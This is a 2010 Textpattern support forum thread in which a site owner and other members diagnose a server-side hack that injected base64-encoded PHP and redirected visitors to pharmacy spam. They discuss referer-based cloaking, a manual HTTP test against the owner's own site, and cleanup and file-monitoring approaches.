Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
#1 2010-08-20 00:38:31
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Site Hacked / Link Hijacking - Need PHP Expert
So pages of my site have been hacked. Example: http://graphicpush.com/sincerity-clarity-brevity-in-that-order (Click on any link and it takes you to a canadian pharma site.) I have combed through all of my forms and PHP files on the server and cannot find anything. Here’s what I have determined:
1.) .htaccess file is clean. Nothing wonky there.
2.) It is not JavaScript. I both disabled JS AND removed all JS from my pages and it’s still hijacked.
3.) It is not a plugin. I disabled them all and the behavior remains.
4.) It is not on every page of my site, but it is consistently on the one I referenced above.
This is clearly being done server-side. I don’t know how. This is the most interesting diagnostic I could find. All other code traces in Firebug and Chrome come up as “clean”.
Any clues? I will give access to server and TXP if necessary. I’d like to learn how this was done to help others in the future.
Kevin
(graphicpush)
Offline
#2 2010-08-20 01:39:08
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
OK, update …
On my server, for a different site, I found a nasty .bin file wrapped up in base64 at the very end of publish.php. Obviously deleted that, but it didn’t help. I never found the reason for the above affected site, but I did a wholesale overwrite of the /textpattern/ directory and that fixed it. So that code was in there somewhere.
Also, I changed my FTP passwords. Good times.
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
The Admin -> Diagnostics tabs didn’t say anything interesting? no modified files?
Offline
#4 2010-08-20 01:56:56
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
maniqui wrote:
The Admin -> Diagnostics tabs didn’t say anything interesting? no modified files?
That was the first thing I checked after I determined it wasn’t JS. Nothing. Weird, right?
Kevin
(graphicpush)
Offline
#5 2010-08-20 02:11:51
- wolfcry911
- Member
- From: MA, USA
- Registered: 2006-06-30
- Posts: 51
Re: Site Hacked / Link Hijacking - Need PHP Expert
You might want to read this post of noah stokes
http://esbueno.noahstokes.com/post/759171096/my-server-was-hacked
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
Download all files from server to your computer ad serach throught files for strange includes. I had similliar hack – in the end of all php/html files was inserted include().
Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebok?
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
Which version of TXP was installed?
Offline
#8 2010-08-20 12:28:32
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
Download all files from server to your computer ad serach throught files for strange includes. I had similliar hack – in the end of all php/html files was inserted include().
Yes, that is my next step. I used a few grep searches across all of my domains, but it’s not as conclusive as I want.
Which version of TXP was installed?
4.2.0. But Textpattern itself was not compromised, just the PHP files on the server.
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
It only redirects if the HTTP request contains a Referer: and User-agent: header and both of these have to pass certain minimum requirements otherwise the redirect doesn’t happen. The referrer has to a be one of the pages that shows these symptoms and the user-agent can’t be as simple as “mozilla/5.0”, but has to be longer. The target URL doesn’t seem to matter as long as it’s in the same domain… the redirect happens even if the target URL doesn’t exist, like http://graphicpush.com/doesntexist.
To check if some TXP file is involved, you could temporarily remove the .htaccess file, so textpattern doesn’t handle requests for files that don’t actually exist on the server, and then manually do a HTTP request and see if it still redirects. (check before and after removing the .htaccess so you know you’re not doing it wrong).
You can do the test manually from the command line:
telnet graphicpush.com 80GET /doesntexist HTTP/1.1
Host: graphicpush.com
Connection: close
User-Agent: Mozilla/5.0 (something)
Referer: http://graphicpush.com/sincerity-clarity-brevity-in-that-orderOffline
Re: Site Hacked / Link Hijacking - Need PHP Expert
How did it end?
Offline
#11 2010-08-27 02:29:07
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
It’s not over. I overwrote the TXP files but the shit was back the next day. So with the help of Dreamhost’s tech support I tracked down a rogue .php file (cleverly named too) that was destroying graphicpush.com. I also found a nasty leach base64 script appended to index.php in the root of another site that was sticking about 100 pharma spam links to my HTML files. The amazing bit about this is that all of this cruft is completely invisible to the end user — but if you view the site as Google (this helped), it was like looking at a completely different site — like looking at a hotel room with infrared glasses and seeing all of the bacteria and insects crawling over the walls.
So now I am looking for a script that can monitor file activity across my sites. Any recommendations?
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
I don’t know of a such a script that runs on the web server. After a similar situation to the one you experienced, we downloaded a copy of our sites to a local Mac (a PC would do just as well) and let NOD32 AV do its thing in the background. This uncovered some rogue files we hadn’t found. We keep this up, syncing the sites every now and again and also looking at the sync logs to see if any .php files update when they shouldn’t.
This is good stuff from Google, you likely have seen it already but the Monitoring your site health is sound advice and refers to the ‘Fetch as Googlebot’ facility you used.Last edited by joebaich (2010-08-27 14:38:48)
Offline